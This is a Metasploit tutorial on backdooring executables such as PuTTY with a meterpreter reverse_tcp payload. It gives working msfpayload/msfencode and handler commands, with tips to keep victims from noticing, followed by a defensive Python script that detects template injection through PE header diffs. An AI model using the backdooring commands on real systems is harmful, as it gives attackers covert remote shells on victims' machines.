One of the latest revisions to Metasploit added a feature that used to take attackers a long time to do by hand: embedding a Metasploit payload in any executable you want, using msfencode's -x (template) option. When I say any executable, I mean any executable. Want to backdoor something you downloaded from the internet? Internet Explorer (iexplore.exe)? explorer.exe? PuTTY? Any of these would work, and the best part is that it's extremely simple. Here is a one-liner that takes whatever executable you want and embeds whatever payload you want.

relik@fortress:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.1.132 LPORT=8080 R | ./msfencode -t exe -x /tmp/putty.exe -o /tmp/putty_backdoored.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 927 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1023 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1093 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 1193 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 1248 (iteration=5)

relik@fortress:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.1.132 LPORT=8080 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on port 8080
[*] Starting the payload handler...

Bring the listener up first, then run putty_backdoored.exe on the target: you have now backdoored your first executable, so enjoy your meterpreter shell. Two things to keep in mind. The handler's LHOST and LPORT must match the values compiled into the payload (shikata_ga_nai is an encoder, not a payload, so it has no business on the msfcli line) or the connection never arrives. And without msfencode's -k option the template's entry point is redirected to the payload and the original PuTTY never runs, which the victim will notice; add -k to keep the template working with the payload running in a new thread. Five iterations of shikata_ga_nai change the payload bytes, but the resulting file still has a new hash and a patched .text section, so do not expect it to sail past file-integrity checks or antivirus on its own.
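As an added example (not part of the original post or of Metasploit), here is the defender's side of this trick: a small Python script that parses the PE headers of a known-good copy of a binary and of a suspect copy and reports the artifacts template injection leaves behind, namely a moved AddressOfEntryPoint, a section that has gained WRITE on top of EXECUTE (self-modifying encoders such as shikata_ga_nai need a writable code section), a changed section size, or a brand-new section. The two PE images it compares are constructed minimal headers built inline for the demonstration, not real PuTTY binaries, and the picture of msfencode's template mode moving the entry point into a now-writable .text section is the heuristic the script assumes, not something verified against every Metasploit version.

```python
"""Spot msfencode-style template injection by diffing PE headers.

Added example for this page, not code from the original post or from
Metasploit. CLEAN and SUSPECT below are constructed minimal PE32 header
images (no real code), standing in for putty.exe and putty_backdoored.exe.
"""
import struct
import sys
from dataclasses import dataclass
from typing import List, Optional, Tuple

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# (name, VirtualAddress, VirtualSize, Characteristics)
Section = Tuple[str, int, int, int]


@dataclass
class PEInfo:
    entry_point: int          # AddressOfEntryPoint (an RVA)
    sections: List[Section]

    def section_for(self, rva: int) -> Optional[str]:
        """Name of the section whose virtual range contains rva."""
        for name, va, vsize, _ in self.sections:
            if va <= rva < va + vsize:
                return name
        return None


def parse_pe(data: bytes) -> PEInfo:
    """Read the entry point and section table straight from the raw headers."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    optional = coff + 20
    entry = struct.unpack_from("<I", data, optional + 16)[0]
    table = optional + size_of_optional
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va = struct.unpack_from("<II", data, off + 8)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, va, vsize, chars))
    return PEInfo(entry, sections)


def compare(clean: PEInfo, suspect: PEInfo) -> List[str]:
    """Header differences that a template-injected payload leaves behind."""
    findings = []
    if clean.entry_point != suspect.entry_point:
        findings.append(
            f"entry point moved 0x{clean.entry_point:x} -> 0x{suspect.entry_point:x}"
            f" (now in {suspect.section_for(suspect.entry_point)})")
    known = {s[0]: s for s in clean.sections}
    for name, _va, vsize, chars in suspect.sections:
        if name not in known:
            findings.append(f"new section {name}")
            continue
        _, _, old_vsize, old_chars = known[name]
        gained = chars & ~old_chars            # flags the suspect copy added
        if gained & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {name} is now writable and executable")
        if vsize != old_vsize:
            findings.append(f"section {name} size 0x{old_vsize:x} -> 0x{vsize:x}")
    return findings


def build_pe(entry: int, sections: List[Section]) -> bytes:
    """Construct a minimal PE32 header image for the demo (not runnable)."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    optional = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry).ljust(0xE0, b"\0")
    table = b"".join(
        name.encode().ljust(8, b"\0")
        + struct.pack("<IIIIIIHHI", vsize, va, 0, 0, 0, 0, 0, 0, chars)
        for name, va, vsize, chars in sections)
    return dos + b"PE\0\0" + coff + optional + table


# Constructed samples: the template, and a copy whose entry point now lands at
# the tail of a .text section that has been made writable (RWX).
CLEAN = build_pe(0x1200, [(".text", 0x1000, 0x8000, 0x60000020),
                          (".data", 0x9000, 0x1000, 0xC0000040)])
SUSPECT = build_pe(0x8F00, [(".text", 0x1000, 0x8000, 0xE0000020),
                            (".data", 0x9000, 0x1000, 0xC0000040)])

if __name__ == "__main__":
    if len(sys.argv) == 3:   # usage: pe_diff.py clean.exe suspect.exe
        CLEAN, SUSPECT = (open(p, "rb").read() for p in sys.argv[1:])
    for line in compare(parse_pe(CLEAN), parse_pe(SUSPECT)) or ["no header differences"]:
        print(line)
```

Run it with no arguments to see the constructed pair diffed, or pass the original and the backdoored executable as the two arguments to compare real files. A moved entry point alone can be a legitimate rebuild, so the combination with a code section that became writable is the signal worth alerting on; a hash mismatch against a known-good copy is of course the cheapest check of all when you have one.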